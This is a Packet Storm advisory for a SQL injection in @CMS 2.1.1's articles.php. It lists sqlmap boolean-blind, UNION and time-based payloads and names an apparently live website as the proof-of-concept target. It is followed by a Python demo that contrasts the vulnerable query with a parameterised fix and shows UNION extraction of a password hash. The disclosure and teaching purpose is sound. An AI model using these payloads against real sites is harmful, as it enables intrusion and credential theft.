@CMS 2.1.1 SQL Injection

2014-08-24T00:00:00
ID PACKETSTORM:127986
Type packetstorm
Reporter Renzi
Modified 2014-08-24T00:00:00

Description

                                            `# SQL Injection on @CMS 2.1.1 Stable  
  
# Risk: High  
  
# CWE number: CWE-89  
  
# Date: 22/08/2014  
  
# Vendor: www.atcode.net  
  
# Author: Felipe "Renzi" Gabriel  
  
# Contact: renzi@linuxmail.org  
  
# Tested on: Linux Mint  
  
# Vulnerable File: articles.php  
  
# Exploit: http://host/articles.php?cat_id=[SQLI]  
  
# PoC: http://carla-columna.de/articles.php?cat_id=[SQLI]  
  
  
--- "SQLi using sqlmap."---  
  
Place: GET  
Parameter: cat_id  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 10 columns  
Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind  
Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs  
---  
  
# Thanks  
  
`
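The three sqlmap findings above all come from one defect: the `cat_id` value is parsed as part of a quoted SQL string literal, so a single quote closes the literal and the rest of the value becomes SQL. The example below is added here to show that mechanism end to end; it is not code from the advisory or from @CMS, whose `articles.php` source is not on this page. The `articles_vulnerable` query is therefore a hypothetical reconstruction of the pattern the payloads imply, the table names and rows are constructed, and an in-memory SQLite database stands in for MySQL. Because of that stand-in the UNION payload is adapted (3 columns instead of the 10 sqlmap found, `--` instead of MySQL's `#`, `||` instead of `CONCAT`), and the `SLEEP(5)` time-based payload is omitted since SQLite has no equivalent. The marker strings are the advisory's own: `0x7163666971` and `0x71676e6371` decode to `qcfiq` and `qgncq`, which is how sqlmap finds its probe value in the response.

```python
import sqlite3

# Marker strings sqlmap wraps around its UNION probe; the advisory's
# CONCAT(0x7163666971, ..., 0x71676e6371) is exactly 'qcfiq' ... 'qgncq'.
PREFIX, SUFFIX = "qcfiq", "qgncq"


def build_db():
    """Constructed in-memory stand-in for the CMS database (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, cat_id TEXT, title TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, pwhash TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?, ?)",
        [(1, "5", "Welcome"), (2, "5", "News"), (3, "7", "Other")],
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "constructed-hash-value")],
    )
    return conn


def articles_vulnerable(conn, cat_id):
    """Hypothetical reconstruction of the flawed pattern: the GET value is
    interpolated into a quoted literal, so a single quote breaks out of it."""
    sql = f"SELECT id, cat_id, title FROM articles WHERE cat_id = '{cat_id}'"
    return conn.execute(sql).fetchall()


def articles_fixed(conn, cat_id):
    """Hardened form: the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT id, cat_id, title FROM articles WHERE cat_id = ?"
    return conn.execute(sql, (cat_id,)).fetchall()


def boolean_blind_probe(query, conn, base="5"):
    """Replays the advisory's boolean-based blind payload and its negation.
    Returns (rows for true condition, rows for false condition, differs).
    An injectable endpoint answers the two differently; a fixed one does not."""
    true_payload = f"{base}' AND 6158=6158 AND 'SEMo'='SEMo"
    false_payload = f"{base}' AND 6158=6159 AND 'SEMo'='SEMo"
    t = query(conn, true_payload)
    f = query(conn, false_payload)
    return len(t), len(f), len(t) != len(f)


def union_extract(query, conn, base="5"):
    """UNION payload in the advisory's shape, adapted to the stand-in:
    3 columns (sqlmap found 10 on the real app), SQLite '--' comment
    instead of MySQL '#', '||' instead of CONCAT. Returns the values
    found between the markers, i.e. what sqlmap would pull from the page."""
    payload = (
        f"{base}' UNION ALL SELECT NULL, "
        f"'{PREFIX}' || username || ':' || pwhash || '{SUFFIX}', NULL "
        f"FROM users--"
    )
    found = []
    for row in query(conn, payload):
        for cell in row:
            if isinstance(cell, str) and cell.startswith(PREFIX) and cell.endswith(SUFFIX):
                found.append(cell[len(PREFIX):-len(SUFFIX)])
    return found


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, blind probe:", boolean_blind_probe(articles_vulnerable, db))
    print("vulnerable, union:      ", union_extract(articles_vulnerable, db))
    print("fixed, blind probe:     ", boolean_blind_probe(articles_fixed, db))
    print("fixed, union:           ", union_extract(articles_fixed, db))
```

Against the reconstructed vulnerable query the true/false pair returns 2 rows and 0 rows, and the UNION row carries `admin:constructed-hash-value` between the markers; against the parameterised query both probes return no rows and nothing is extracted, because the whole payload is matched as a literal category id. For an integer key like `cat_id`, casting to `int` before the query (and rejecting anything else) is a cheap second layer, but binding the parameter is the actual fix.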